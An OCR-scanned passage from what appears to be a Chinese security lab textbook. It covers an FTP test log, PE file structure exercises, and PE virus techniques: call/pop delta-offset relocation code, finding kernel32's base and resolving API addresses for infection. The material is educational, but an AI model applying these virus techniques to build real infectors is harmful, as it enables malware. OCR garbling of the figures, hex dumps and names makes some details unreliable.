-ITW-I--[-- 1 503 503 15 Dec 14 10:40 ftp.txt 
226 Directory send OK. 

ftp> get ftp.txt 

local: ftp.txt remote: ftp.txt 

227 Entering Passive Mode (192, 168, 0, 10, 211, 221) 
150 Opening BINARY mode data connection for ftp.txt (15 bytes). 
226 File send OK. 

15 bytes received in 5.6e-05 secs (2.6e+02 Kbytes/sec) 

ftp> put test.txt 

local: test.txt remote: test.txt 

227 Entering Passive Mode (192, 168, 0, 10, 99, 151) 
150 Ok to send data. 

226 File receive OK. 

11 bytes sent in 0.0129 secs (0.83 Kbytes/sec) 

ftp> bye 

221 Goodbye. 


图 11-58 ”virtural_user2 测试 结果 
(2) 分 析 FTP 服务 器 常见 漏洞 和 弱点 ， 分 析 本 机 配置 是 否 安全 。 


【思考 题 】 
FTP 服务 器 中 用 户 认证 的 用 户 名 和 口令 是 采用 明文 在 网 络 上 传输 的 , 很 容易 被 窍 听 ， 
请 通过 嗅 探 器 进行 验证 ， 并 思考 如 何 避 免 这 种 攻击 。 
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各 1 ”PE 文件 结构 分 析 


12.1.1 PE 文件 的 基本 结构 


【实验 目的 】 
熟悉 PE 编辑 查看 工具 ， 详 细 了 解 PE 文件 格式 ， 理 解 PE 文件 头 结构 。 
【原理 简介 】 


1. 什么 是 PE 文件 

PE 的 意思 就 是 Portable Executable〈 可 移植 的 执行 体 )， 它 是 Win32 环境 自身 所 带 的 
执行 体 文件 格式 。 它 的 一 些 特性 继承 自 UNIX 的 Coff (Common object file format) 文件 
格式 。portable 意味 着 此 文件 格式 是 跨 Win32 平台 的 ， 即 使 Windows 运行 在 非 Intel 的 
CPU 上 ， 任 何 Win32 平台 的 PE 装载 器 都 能 识别 和 使 用 该 文件 格式 。 当 然 ， 移 植 到 不 同 
的 CPU 上 PE 执行 体 必 然 得 有 一 些 改变 .所 有 Win32 执行 体 ( 除 了 VxD 和 16 位 的 DLL) 
都 使 用 PE 文件 格式 ， 包 括 NT 的 内 核 模式 驱动 程序 (Kemel Mode Drivers )。 

2. PE 文件 基本 结构 

(1) 所 有 PE 文件 〈 甚 至 32 位 的 DLLs) 必须 以 一 个 简单 的 DOS MZ header 开始 。 
紧 随 DOS MZ header 之 后 的 是 DOS stub。DOS stub 实际 上 是 个 有 效 的 EXE， 在 不 支持 
PE 文件 格式 的 操作 系统 中 ， 它 将 简单 显示 一 个 错误 提示 。 大 多 数 情况 下 它 是 由 汇编 器 / 
编译 器 自动 生成 。 

(2) 紧 接 着 DOS stub 的 是 PE header。PE header 是 PE 相关 结构 IMAGE NT _ 
HEADERS 的 简称 ， 其 中 包含 许多 PE 装载 器 用 到 的 重要 域 。 执 行 体 在 支持 PE 文件 结构 
的 操作 系统 中 执行 时 ，PE 装载 器 将 从 DOS MZ header 中 找到 PE header 的 起 始 偏 移 量 。 
PE 文件 的 真正 内 容 划 分 成 块 ， 称 为 sections ( 节 )， 每 节 是 一 块 拥有 共同 属性 的 数据 ， 比 
如 代码 /数据 、 读 / 写 等 。 节 的 划分 是 基于 各 组 数据 的 共同 属性 ， 而 不 是 逻辑 概念 。 重 要 的 
不 是 数据 /代码 是 如 何 使 用 的 ， 如 果 PE 文件 中 的 数据 /代码 拥有 相同 属性 ， 它 们 就 能 被 归 
入 同一 节 中 。 

(3) PE header 接 下 来 的 数组 结构 是 section table〈 节 表 )。 每 个 结构 包含 对 应 节 的 属 
性 、 文 件 偏 移 量 、 虚 拟 偏 移 量 等 。 如 果 PE 文件 里 有 5 个 节 ， 那 么 此 结构 数组 内 就 有 5 


个 成 员 。 


3. PE 文件 头 
PE 文件 头 由 IMAGE NT_HEADERS 结构 定义 如 下 : 


IMAGE NT HEADERS STRUCT 
DWORD Signature; //PE 文件 标识 
IMAGE FILE HEADER FileHeader; 
IMAGE OPTIONAL HEADER32 OptionalHeader:; 
IMAGE NT HEADERS ENDS 


PE 文件 头 的 第 一 个 双 字 是 PE 文件 的 标志 ， 它 被 定义 为 00004550h， 也 就 是 字符 串 
“PE\O0\0”, 
第 二 个 域 是 PE 文件 头 , 为 一 个 20B 的 IMAGE FILE_HEADER 结构 体 ， 定 义 如 下 : 


IMAGE FILE HEADER STRUCT 


WORD Machine; // 运 行 平台 

WORD NumberOfSections; // 文 件 节 表 (Section) 数目 

DWORD TimeDateStamp; // 文 件 创建 日 期 和 时 间 
DWORDPointerToSymbolTable;  // 指 向 符号 表 (用 于 调试 ) 
DWORDNumberOfSymbols; // 符 号 表 中 符号 的 数量 
WORDSizeOfOptionalHeader; ”// 指 示 之 后 的 可 选 头 部 结构 的 大 小 ,必须 为 有 效 值 
WORDCharacteristics; // 文 件 属性 , 比如 all 或 exe 


IMAGE FILE HEADER ENDS 


第 三 个 域 是 PE 可 选 头 部 ， 为 一 个 224B 的 IMAGE_OPTIONAL _HEADER 结构 体 ， 
定义 如 下 : 
IMAGE_OPTIONAL HEADER32 STRUCT 
WORD Magic; 


BYTE MajorLinkerVervion; // 链 接 器 版 本 号 

BYTE MinorLinkerVervion; 

DWORD SizeOfCode; // 所 有 含 代码 节 的 总 大 小 

DWORD SizeOfInitializedDate; // 所 有 含 已 初始 化 数据 的 节 的 总 大 小 
DWORD SizeOofUninitializedDate; // 所 有 含 未 初始 化 数据 的 节 的 总 大 小 
DWORD AddressOfEntryPoint; / /程序 执行 入 口 RVA 

DWORD BaseOfCode; // 代 码 节 的 起 始 RVA 


IMAGE OPTIONAL HEADER32 ENDS 


注 : RVA (Relative Virtual Address) 代表 相对 虚拟 地 址 ， 是 虚拟 空间 到 参考 点 的 一 
段 距离 。 在 PE 文件 中 ， 参 考点 是 指 PE 文件 装 入 内 存 后 文件 头 〈 而 非 PE 文件 头 ) 的 
地 址 。 

4. 装载 PE 文件 的 主要 步骤 

(1) 当 PE 文件 被 执行 ，PE 装载 器 检查 DOS MZ header 里 的 PE header 偏 移 量 。 如 
果 找 到 ， 则 跳 转 到 PE header。 

(2) PE 装载 器 检查 PE header 的 有 效 性 。 如 果 有 效 ， 就 跳 转 到 PE header 的 尾部 。 
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(3) 紧 跟 PE header 的 是 节 表 。PE 装载 器 读 取 其 中 的 节 信息 ， 并 采用 文件 映射 方法 
将 这 些 节 映射 到 内 存 ， 同 时 附 上 节 表 里 指定 的 节 属 性 。 

(4) PE 文件 映射 入 内 存 后 ，PE 装载 器 将 处 理 PE 文件 中 类 似 import table (引入 表 ) 
的 逻辑 部 分 。 

【实验 环境 】 

Windows XP 系统 ，UltraEdit，hello-2.5.exe。 


【实验 步骤 】 


使 用 UltraEdit 来 分 析 PE 文件 ， 有 助 于 深入 理解 PE 文件 头 结构 。 用 UltraEdit 打开 
程序 hello-2.5.exe， 如 图 12-1 所 示 。 


(TILtraFdit-32 = [E;Misep 项 目 \ 务 种 实验 工具 MPE 文 件 \hello ?2.5 
jp 


oo Explorer | 4 ~ 50000090F: 


‘000000a0h 


000001cOh: 00 00 00 00 00 
000001ldoh: 2E 72 64 61 74 
‘000001e0h: 00 02 00 00 00 


BIJU 华 汪 二 人 人 双 匡 松手 硬 A 出国 所 加 6 国 国 妇 < 合生 有 | 二 村 由 胃 蕊 有 | 
er Help, press FL os bOK 176, CO [os [ Mod: 2005-5-21 23:02:52 [Bytes Sel: 248 Fas 


图 12-1 用 UltraEdit 分 析 打 开 程序 hello-2.5.exe 


用 UltraEdit 分 析 打 开 程序 hello-2.5.exe， 可 以 看 到 ， 左 侧 为 十 六 进 制 数据 ， 右 侧 为 
ASCII 文 件 ， 是 以 ASCII 字符 MZ 开始 的 。MZ 是 DOS 头 的 标志 ， 表 示 文 件 开 头 这 些 字 
节 是 一 个 DOS 头 。 严 格 来 说 ，DOS 头 并 不 是 PE 文件 格式 的 一 部 分 ， 但 是 几乎 所 有 的 
PE 文件 都 是 以 DOS 头 开始 的 。 从 文件 起 始 到 PE 头 之 间 的 这 个 DOS 头 及 其 后 面 的 一 小 
段 内 容 ， 叫 作 Dos stub。 一 个 DOS stub 其 实 就 是 一 个 DOS 程序 ， 其 作用 主要 是 为 了 在 
非 Win32〈 比 如 纯 DOS) 环境 下 显示 一 个 “This program cannot be run in DOS mode” 的 
提示 字符 串 。 

根据 PE 文件 头 的 定义 ， 图 12-1 中 选中 位 置 为 整个 PE 文件 头 的 内 容 ，PE 文件 头 是 
以 ASCII 字 符 PE 开始 的 ，PE 文件 头 的 结构 体 定义 见 原 理 简介 ， 这 里 不 再 袭 述 。 
之 后 便 是 节 表 ， 该 PE 文件 中 的 节 表 是 以 ASCII 的 .text 开始 ， 节 表 中 包含 对 应 节 的 
属性 、 文 件 偏 移 量 、 虚 拟 偏 移 量 等 。 
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【思考 题 】 
使 用 UltraEdit 修改 该 程序 ， 使 得 hello-2.5.exe 程序 仅 弹 出 第 二 个 对 话 框 。 


12.1.2 引入 引出 函数 节 分 析 


【实验 目的 】 
了 解 引入 引出 函数 节 的 基本 组 织 结构 。 
【原理 简介 】 
(1) 引入 函数 节 的 基本 组 织 结构 如 图 12-2 所 示 。 
TINAGE_INPORT_DESCTRIPTOR 
OriginalFirstThunk 
Tiaepatestap 
ForwarderChain 
Nane ———>"USER32. DLL” 
FirstThunk 


Hint-name table TINAGE_INPORT_ BY NAME inport address table(IAT) 
-> | TMAGE_THUNK_DATA |-> < 一 | INAGE_THUNK_DATA |<-- 


Hint|functionnanel 


NULL 
图 12-2 引入 函数 节 的 基本 组 织 结构 
IMAGE IMPORT _DESCTRIPTOR 结构 的 定义 如 下 : 


IMAGE IMPORT DESCTRIPTOR STRUCT 
Union 
DWORD Characteristics; 
DWORD OriginalFirstThunk; 
Ends 
DWORD TimeDateStamp; 
DWORD ForwarderChain; 
DWORD Namel; 
DWORD FirstThunk; 
IMAGE IMPORT DESCTRIPTOR ENDS 


一 个 IMAGE_THUNK_DATA 结构 实际 上 就 是 一 个 双 字 ， 定 义 如 下 : 


IMAGE THUNK DATA STRUCT 
Union ul 
DWORD ForwarderString; 
DWORD Function; 
DWORD Ordinal; 
DWORD AddressOfData; 
Ends 
IMAGE THUNK DATA ENDS 
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IMAGE IMPORT_BY_NAME 用 来 定义 引入 函数 的 名 称 ， 结 构 如 下 : 


IMAGE IMPORT BY NAME STRUCT 
WORD Hint; 
BYTE Namel; 

IMAGE IMPORT BY NAME ENDS 


(2) 引出 函数 节 的 基本 组 织 结构 如 图 12-3 所 示 。 


TNAGE_EXPORT_DESCTRIPTOR 函数 地 址 表 
Characteristics Ox400042"myfun1” 
i Ox400085 
NumberOfFunctions Ox400197 "nyfun2’ 
NumberOfNanes | | 
AddressOfFunctions | 一 | 函数 名 表 
AddressOfNanes 一 Ox0000000 |->"mayfunl" 


AddressOfNameOrdinals | 一 


中 


图 12-3 引出 函数 节 的 基本 组 织 结构 
引出 表 的 起 始 位 置 是 一 个 IMAGE _EXPORT _ DIRECTORY 结构 ， 定 义 如 下 : 


IMAGE EXPORT DIRECTORY STRUCT 


DWORD Characteristics; // 未 使 用 ,总 是 0 

DWORD TimeDateStamp; // 文 件 的 产生 时 刻 

WORD MajorVersion; // 未 使 用 ,总 是 0 

WORD MinorVersion; // 未 使 用 ,总 是 0 

DWORD nName; // 指 向 文件 名 的 RVA 
DWORD nBase; // 引 出 函数 的 起 始 序 号 
DWORD NumberOfFunctions; /7 引出 函数 的 总 数 

DWORD NumberOfNames; // 以 名 称 引出 的 函数 总 数 
DWORD AddressOfFunctions; // 指 向 引出 函数 地 址 表 的 RVA 
DWORD AddressOfNames; // 指 向 函数 名 地 址 表 的 RVA 
DWORD AddressOfNameOrdinals; // 指 向 函数 名 序号 表 的 RVA 


IMAGE EXPORT DIRECTORY ENDS 


【实验 环境 】 
Windows XP 系统 ，hello-2.5.exe，user32.dll。 


【实验 步 又 】 

1. hello-2.5.exe 引入 函数 节 分 析 

用 UltraEdit 打开 程序 hello-2.5.exe， 进 行 以 下 实验 分 析 ， 如 图 12-4 所 示 ， 图 中 选 定 
部 分 为 引入 函数 节 两 个 完整 的 组 织 结构 。 
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图 12-4 引入 函数 节 分 析 


在 hello-2.5.exe 的 可 选 映像 头 中 引入 表 的 RVA 为 2014H， 而 引入 函数 节 在 内 存 中 的 
RVA 为 2000H, 故而 引入 表 相 对 引入 函数 节 起 始 位 置 偏 移 为 14H, 而 该 节 在 文件 中 的 RVA 
为 600H， 所 以 IMAGE IMPORT _DESCRIPTOR 在 文件 中 位 置 为 《2014H-2000H ) 
+600H=614H， 则 OriginalFirstThunk 值 为 2050H， 按 照 与 前 面相 同 的 计算 方法 (下 同 )， 
650H 处 为 IMAGE THUNK DATA ， 值 为 2064 ， 则 文件 664H 处 为 一 个 
IMAGE IMPORT _ BY _ NAME 结构。 这 个 位 置 第 一 个 WORD 为 80H (引入 函数 的 序号 )， 
之 后 是 “ExitProcess”( 引 入 函数 名 )， 以 0 结尾 。 

这 个 IMAGE_IMPORT_DESCRIPTOR 结构 的 Name 为 672H 处 的 kernel32.dll。 
FirstThunk 字段 值 为 2000H， 实 际 地 址 为 600H， 值 为 2064H， 位 置 为 664， 看 得 出 来 与 
OriginalFirstThunk 最 终 指 向 的 内 容 相同 ， 而 文件 600H 处 的 数值 在 程序 运行 时 会 被 设置 
为 ExitProcess 的 真实 地 址 。 

2. user32.dll 引出 函数 节 分 析 

用 UltraEdit 分 析 打开 user32.dll 进行 以 下 实验 分 析 ， 如 图 12-5 所 示 ， 图 中 选中 部 分 
为 CloseWindow 函数 的 起 始 地 址 。 

在 user32.dll 中 引出 函数 节 位 于 .text 节 中 。IMAGE EXPORT DESCRIPTORY 在 文 
件 中 的 RVA 为 2D00H, 其 结构 中 几 个 重要 字段 分 别 为 :AddressOfFunctions(RVA),3928H; 
AddressOfNames(RVA), 4498; AddressOfNamesOrdinals(RVA)，5008H。 由 于 user32.dll 
中 , .text 节 在 内 存 中 RVA 为 1000H, 在 文件 中 偏 移 为 400H, 故 分 别 换算 成 2D28H, 3898H， 
4408H。 

引出 函数 的 序列 号 、 函 数 名 和 函数 地 址 分 别 在 三 个 不 同 的 数组 中 ， 一 一 对 应 。 文 件 
2D28H 开始 的 数组 中 按 双 字 存 放 函 数 地 址 、3898H 开始 的 数组 中 按 双 字 存 放 函 数 名 字符 
串 的 地 址 、4408H 开始 的 数组 中 按 字 存放 函数 序列 号 。 
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00004el0h: 65 44 65 73 68 74 6F 70 00 BEMec sr 73 65 57 69 ; el 


图 12-5 UltraEdit 打开 user32.dll 


以 函数 CloseWindow 为 例 。 首先 找到 CloseWindow 在 文件 中 的 地 址 为 4E19H,， 换算 
成 内 存 地 址 为 SA19H， 到 文件 中 AddressOfNames 的 RVA 处 查看 5A19H 确定 其 是 第 69 
个 地 址 。 因 为 AddressOfNames 和 AddressOfNamesOrdinal 一 一 对 应 ， 确 定 其 序列 号 44H 
(69 以 十 六 进 制 表 示 为 45H， 因 序列 号 从 00 开始 故 为 44H)， 故 在 AddressOfFunctions 
中 2D28H+44HX4=2E38H 处 有 函数 地 址 值 00045F7F， 由 于 user32.dll 的 ImageBase 为 
77D10000， 故 而 CloseWindow 在 内 存 中 的 实际 地 址 为 77D55F7F。 


【思考 题 】 
请 对 user32.dll 引出 函数 表 进行 分 析 (分析 MessageBoxA 函数 的 地 址 )， 回 答 以 下 问 


(1) 该 函数 名 称 字符 串 在 文件 中 的 位 置 : 
(2) 该 函数 的 序列 号 
(3) 该 函数 在 内 存 中 的 实际 地 址 : 


12.1.3 ”PE 文件 资源 节 分 析 


【实验 目的 】 
用 PE 查看 工具 分 析 PE 资源 节 的 目录 结构 ， 了 解 PEview 图 标的 数据 段位 置 。 
【原理 简介 】 


资源 节 装 载 整个 resource table 结构 和 资源 的 数据 ， 整 个 resource table 由 4 个 结构 
组 成 : 

e@ IMAGE RESOURCE _ DIRECTORY 结构 

。 IMAGE RESOURCE DIRECTORY _ENTRY 结构 
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e IMAGE RESOURCE DIRECTORY STRING 或 IMAGE RESOURCE DIR_ 
STRING _U 结构 

e IMAGE RESOURCE DATA ENTRY 结构 

整个 resource 结构 是 一 个 树 状 结构 ， 只 有 一 个 root 〈 根 ) 节点 ， 然 后 长 出 许多 的 树 
枝 ， 最 后 是 叶子 。 根 部 和 每 个 树枝 是 一 个 节点 ， 这 个 节点 由 IMAGE RESOURCE 
DIRECTORY 结构 和 IMAGE RESOURCE DIRECTORY _ENTRY 结构 组 成 。 而 
IMAGE RESOURCE DIRECTORY STRING (IMAGE RESOURCE DIR STRING U) 
结构 和 IMAGE_RESOURCE_DATA_ENTERY 都 是 整个 资源 树 末 端的 叶子 。 

1. Directory (目录 ) 结构 


IMAGE RESOURCE DIRECTORY STRUCT 

DWORD Characteristics; 

DWORD TimeDateStamp; 

WORD MajorVersion; 

WORD MinorVersion; 

WORD NumberOfNamedEntries; 

WORD NumberOfIdEntries; 
// IMAGE RESOURCE DIRECTORY ENTRY DirectoryEntries[]; 
IMAGE RESOURCE DIRECTORY ENDS 


这 个 结构 里 的 Characteristics、MajorVersion 以 及 MinorVersion 一 直 为 0， 不 使 用 。 

NumberOfNamedEntries 代表 一 个 数量 ， 表 示 以 Name 作为 子 树 的 个 数 。 

NumberOfIdEntries 代表 一 个 数量 ， 表 示 以 ID 作为 子 树 的 个 数 。 

而 Directory 引出 的 Entry 数量 是 NumberOfNamedEntries 与 NumberOfldEntries 之 和 ， 
即 : NumberOfNamedEntries+NumberOffdEntries 等 于 Entry 的 数量 。 

2. Entry 结构 的 定义 

IMAGE RESOURCE DIRECTORY ENTRY STRUCT 

DWORD Name; 


DWORD OffsetToData:; 
IMAGE RESOURCE DIRECTORY_ ENTRY ENDS 


当 Name 的 高 最 位 (bit31) 为 1 时 : Name[0...30]( 低 31 位 ) 是 一 个 offset 指向 
IMAGE RESOURCE DIR_STRING _U 结构 。Bit31 为 0 时 ，Name 表示 一 个 ID 值 。 

当 OffsetToData 的 最 高 位 (bit31) 为 1 时 : OffsetToData[0...30] 〈 低 31 位 ) 是 一 个 
offset 指向 下 一 个 Directory 结构 。bit31 为 0 时 ，OffsetToData 仍然 是 一 个 offset 值 ， 它 指 
向 一 个 IMAGE_ RESOURCE _DATA_ENTRY 结构 。 

Entry 的 职责 是 给 出 下 一 个 Directory 或 Data， 从 资源 树 的 角度 来 看 ，Entry 要 么 给 出 
下 一 个 节点 ， 要 么 给 出 叶子 。 

【实验 环境 】 

Windows XP 系统 ，PEview.exe。 
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【实验 步骤 】 

1. PEview.exe 资源 节 分 析 

在 PE 文件 中 ， 资 源 节 的 组 织 类 似 于 磁盘 文件 的 组 织 ， 是 基于 多 级 目录 的 。PE 文件 
中 资源 节 的 根 目录 和 子 目 录 都 是 一 种 IMAGE_ RESOURCE DIRECTORY 结构 。 

IMAGE RESOURCE _ DIRECTORY 之 后 是 一 系列 由 IMAGE RESOURCE 
DIRECTORY ENTRY 结构 组 成 的 数组 作为 一 级 目录 。 数 组 中 的 元 素 个 数 由 
IMAGE_ RESOURCE _DIRECTORY 中 NumberOfIdEntries 字段 的 值 确定 。 

PEview.exe 中 有 9 个 IMAGE _ RESOURCE _DIRECTORY_ENTRY 结构 ,ID 从 02H 
的 BITMAP 到 18H 的 MANIFEST。 用 PEview 查看 这 个 部 分 ， 对 应 于 IMAGE 
RESOURCE _ DIRECTORY 中 的 Type 部 分 。 

一 级 目录 之 后 为 二 级 目录 , 在 PEview.exe 文件 中 B058H 一 B15CH, 用 PEview 查看 ， 
对 应 于 IMAGE RESOURCE_DIRECTORY 中 的 NameID。 

三 级 目录 在 二 级 目录 之 后 ， 从 B160H 至 B2C4H， 用 PEview 查看 ， 对 应 于 
IMAGE_ RESOURCE _DIRECTORY 里 的 Language， 而 目录 的 offset 指向 的 就 是 DATA 
ENTRY。 

IMAGE RESOURCE DATA_ENTRY 中 含 RVAOfData、Size、CodePage、Reserved 
等 字段 ， 其 中 RVAOfData 指向 资源 数据 部 分 。 

2. PEview.exe 图 标的 替换 

使 用 PEview 打开 PEview.exe， 找 到 ICON 0001， 这 就 是 PEview.exe 的 图 标 。 它 的 
数据 位 于 文件 CA48H 一 CD2FH 的 744 个 字 节 。 使 用 UltraEdit 打开 PEview.exe， 修 改 这 
744 个 字 节 ， 那 么 会 发 现 图标 已 经 不 同 了 。 

【思考 题 】 

用 UltraEdit 修改 PEview.exe， 使 得 该 文件 的 图 标 变 成 PEview.ico。 


区 3 ”PE 病毒 分 析 


12.2.1 ”病毒 重 定位 


【实验 目的 】 
了 解 PE 病毒 的 基本 原理 ， 熟 悉 PE 病毒 中 的 部 分 关键 技术 。 
【原理 简介 】 


在 编写 正常 程序 的 时 候 根本 不 用 去 关心 变量 (常量 ) 的 位 置 ， 因 为 源 程序 在 编译 的 
时 候 它 在 内 存 中 的 位 置 已 经 被 计算 好 了 。 程 序 装 入 内 存 时 ， 系 统 不 会 为 它 重 定位 。 而 病 
毒 的 生存 空间 就 是 宿主 程序 ， 而 因为 宿主 程序 不 同 ， 所 以 病毒 每 次 插入 到 宿主 程序 中 的 
位 置 也 不 同 。 那 么 病毒 需要 用 到 的 变量 的 位 置 就 无 法 确定 。 这 就 是 病毒 首先 要 重 定位 的 
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下 面 介 绍 儿 种 常见 的 病毒 重 定位 的 方法 。 
1. call vstart 


vstart: 
pop ebx 
sub ebx, offset vstart 


这 种 是 最 简单 的 重 定位 方式 。 下 面 逐 句 地 讲解 这 种 重 定位 方法 。 

call vstart。 该 语句 导致 程序 流程 转向 vstart 所 标记 的 pop ebx 一 句 ， 同 时 ，pop ebx 
所 在 的 地 址 〈 也 就 是 vstart 所 标记 的 地 址 ) 被 放 入 堆栈 中 。 

vstart: pop ebx。 这 名 会 把 堆栈 中 刚 存 入 的 vstart 的 地 址 弹出 并 放 入 ebx 寄存 器 中 。 
将 ebx 中 的 实际 地 址 和 offset vstart〈 编 译 时 算出 的 地 址 ) 相 减 ， 得 出 实际 地 址 和 编译 地 
址 的 差 值 。 病 毒 会 始终 保持 这 个 差 值 ， 在 需要 使 用 编译 地 址 的 地 方 〈 通 常 是 寻找 代码 中 
的 某 个 变量 时 )， 将 编译 地 址 加 上 差 值 后 再 来 使 用 。 

2. vstart 


call getvs 

getvs: 

call getvs_ 01 

getvs_01: 

pop ebx 

Sub ebx, offset getvs 01 - offset vstart 


这 种 定位 方法 在 原理 上 和 第 一 种 一 样 ， 只 是 把 定位 点 改 为 vstart 了 。 

Vstart: call getvs。 使 程序 流程 转 到 getvs: call getvs_01, 同时 把 该 处 的 地 址 压 入 堆栈 。 

getvs: call getvs_01。 使 程序 流程 转 到 getvs_01: pop ebx 处 ， 同 时 把 该 处 的 地 址 压 入 

getvs_01: pop ebx。 将 getvs_01 的 实际 地 址 弹出 放 入 ebx 中 。 

sub ebx, offset getvs_01 一 offset vstart。getvs_01 的 实际 地 址 - getvs_01 的 编译 地 址 
二 Vstart 的 编译 地 址 = 程序 实际 地 址 和 编译 地 址 的 差 值 + vstart 的 编译 地 址 = vstart 的 实 
际 地 址 。 


【实验 环境 】 
UltraEdit, hello-2.5.exe, hello.exe。 


【实验 步骤 】 

熟悉 病毒 重 定位 的 基本 思路 和 方法 ， 在 hello-2.5.exe 中 添加 一 段 代 码 ， 该 段 代 码 满 
足以 下 几 个 条 件 。 

(1) 该 段 代码 弹出 一 个 对 话 框 《标题 : 信安 病毒 重 定位 ， 内 容 : 姓名 + 学 号 )。 

(2) 该 段 代码 同时 包括 代码 和 字符 串 数据 。 

(3) 该 段 代 码 可 以 插入 到 .text 节 的 任意 指令 之 间 ， 而 不 需要 修改 该 段 代码 中 的 任何 
字 节 。 
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(1) 编写 一 个 程序 ， 可 用 来 搜索 指定 目录 下 的 所 有 EXE 文件 ， 用 MessageBox 显示 
每 一 个 被 搜索 到 的 EXE 文件 名 。 
(2) 添加 代码 后 的 PE 文件 hello.exe 已 经 给 出 ， 用 UE 以 二 进 制 形式 打开 hello.exe 


并 回答 下 面 的 问题 : 
@ 对 比 修改 前 后 的 PE 文件 ， 入 口 地 址 从 修改 为 
@ 对 比 修改 前 后 的 PE 文件 ， 代 码 段 的 大 小 从 修改 为 
12.2.2 ”搜索 API 函数 地 址 
【实验 目的 】 


熟悉 病毒 感染 的 关键 技术 ， 了 解 获取 API 函数 地 址 的 必要 性 以 及 如 何 获取 API 函数 
地 址 。 


【原理 简介 】 

1. 获取 Kernel32 的 基地 址 

(1) 为 什么 要 获取 API 函数 地 址 ? Win32 PE 病毒 和 普通 Win32 PE 程序 一 样 需要 调 
用 API 函数 ， 但 是 普通 的 Win32 PE 程序 里 面 有 一 个 引入 函数 表 ， 该 函数 表 对 应 了 代码 
段 中 所 用 到 的 API 函数 在 动态 链接 库 中 的 真实 地 址 。 这 样 ， 调 用 API 函数 时 就 可 以 通过 
该 引入 函数 表 找 到 相应 API 函数 的 真正 执行 地 址 。 但 是 ， 对 于 Win32 PE 病毒 来 说 ， 它 
只 有 一 个 代码 段 ， 并 不 存在 引入 函数 段 。 既 然 如 此 ， 病 毒 就 无 法 像 普 通 PE 程序 那样 直 
接 调 用 相关 API 函数 ， 而 应 该 先 找 出 这 些 API 函数 在 相应 动态 链接 库 中 的 地 址 。 

(2) 如 何 获取 API 函数 地 址 ? 如 何 获取 API 函数 地 址 一 直 是 病毒 技术 的 一 个 非常 重 
要 的 话题 。 要 获得 API 函数 地 址 ， 首 先 需要 获得 Kernel32 的 基地 址 。 

(3) 如 何 获 得 Kernel32 的 基地 址 ? 不 同 的 操作 系统 对 应 不 同 的 Kernel32 的 基地 址 ， 
也 可 以 用 PE 查看 工具 来 查看 其 在 内 存 中 的 基地 址 。 

2. 获取 API 函数 地 址 
已 知 函 数 的 导出 序号 ， 然 后 : 

(1) 定位 到 PE 文件 头 。 

(2) 从 PE 文件 头 中 的 可 选 文件 头 中 取出 数据 目录 表 的 第 一 个 数据 目录 ， 得 到 导出 
表 的 地 址 。 

(3) 从 导出 表 的 Base 字段 取得 起 始 序号 。 

(4) 将 需要 查找 的 导出 序号 减 去 起 始 序号 ， 得 到 函数 在 入 口 地址 表 中 的 索引 。 

(5) 检查 索引 值 是 否 大 于 等 于 导出 表 中 的 函数 个 数 。 如 果 大 于 ， 说 明 输 入 的 序号 

(6) 用 该 索引 值 在 AddressOfFunctions 字段 指向 的 导出 函数 入 口 地 址 表 中 取出 相应 
的 项 目 ， 这 就 是 函数 的 入 口 地 址 RVA 值 ， 当 函数 被 装 入 内 存 后 ， 这 个 RVA 值 加 上 模块 
实际 装 入 的 基 址 (ImageBase)， 就 得 到 了 函数 真正 的 入 口 地 址 。 
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【实验 环境 】 
Windows XP 系统 ，ollydbg.exe，hello-2.5.exe，kernel32.dll。 


【实验 步 又 】 
用 ollydbg 打开 hello-2.5.exe， 获 取 kernel32.dll 模块 基地 址 ， 定 位 到 kernel32.dll 模 
块 。 当 系统 打开 一 个 可 执行 文件 的 时 候 ， 它 会 调用 kernel32.dll 中 的 CreateProcess 函数 ; 
CreateProcess 函数 在 完成 装载 应 用 程序 后 ， 会 先 将 一 个 返回 地 址 压 入 到 堆栈 顶端 ， 然 后 
转向 执行 刚才 装载 的 应 用 程序 。 当 该 应 用 程序 结束 后 , 会 将 堆栈 顶端 数据 弹出 放 到 IP 中 ， 
继续 执行 。 刚 才 堆 栈 顶 端 保存 的 数据 是 什么 呢 ? 仔 细 想 想 ， 不 难 明白 ， 这 个 数据 其 实 就 
是 在 kemal32.dll 中 的 返回 地 址 。 其 实 这 个 过 程 与 应 用 程序 用 call 指令 调用 子 程序 类 似 。 
可 以 看 出 ， 这 个 返回 地 址 是 在 kemal32.dll 模块 中 。 另 外 ，PE 文件 被 装 入 内 存 时 是 按 内 
存 页 对 齐 的 ， 只 要 从 返回 地 址 按照 页 对 齐 的 边界 一 页 一 页 地 往 低地 址 搜索 ， 就 必然 可 以 
找到 kernel32.dll 的 文件 头 地 址 ， 即 kernel32 模块 的 基地 址 。 

在 Windows XP 系统 下 面 获得 的 kernel32 模块 的 基地 址 为 7C800000 ”也 可 以 
用 Stud_PE.exe 打开 ， 其 中 的 imagebase 即 为 模块 的 基地 址 )。 

从 内 存 中 的 kernel32.dll 模块 获取 函数 LoadLibraryA 和 GetProcessAddress 的 函数 地 
址 ， 并 实际 检验 获得 的 地 址 是 否 正确 。 

(1) 定位 到 PE 文件 头 。 

(2) 从 PE 文件 头 中 的 可 选 文 件 头 中 取出 数据 目录 表 的 第 一 个 数据 目录 ， 得 到 导出 
表 的 地 址 。 

(3) 从 导出 表 的 NumberOfNames 字段 得 到 已 命名 函数 的 总 数 ， 并 以 这 个 数字 做 微 
循环 的 次 数 来 构造 一 个 循环 。 

(4) 从 AddressOfNames 字段 指向 的 函数 名 称 地址 表 的 第 一 项 开始 ， 在 循环 中 将 每 
一 项 定义 的 函数 名 与 要 查找 的 函数 名 比较 ， 如 果 没 有 任何 一 个 函数 名 符合 ， 说 明文 件 中 
没有 指定 名 称 的 函数 。 

(5) 如 果 某 一 项 定义 的 函数 名 与 要 查找 的 函数 名 符合 ， 那 么 记 住 这 个 函数 名 在 字符 
串 地 址 表 中 的 索引 值 (如 x*)， 然 后 在 AddressOfNameOrdinals 指向 的 数组 中 以 同样 的 索 
引 值 x 去 找 数组 项 中 的 值 ， 假 如 该 值 为 m。 

(6) 以 m 值 作为 索引 值 ， 在 AddressOfFunctions 字段 指向 的 函数 入 口 地址 表 中 获取 
的 RVA 就 是 函数 的 入 口 地址 ， 当 函数 被 装 入 内 存 后 ， 这 个 RVA 值 加 上 模块 实际 装 入 的 
基 址 (ImageBase)， 就 得 到 了 函数 真正 的 入 口 地 址 。 


12.2.3 ”病毒 感染 分 析 


【实验 目的 】 
了 解 病毒 感染 的 原理 以 及 过 程 ， 学 会 清除 PE 病毒 。 
【原理 简介 】 


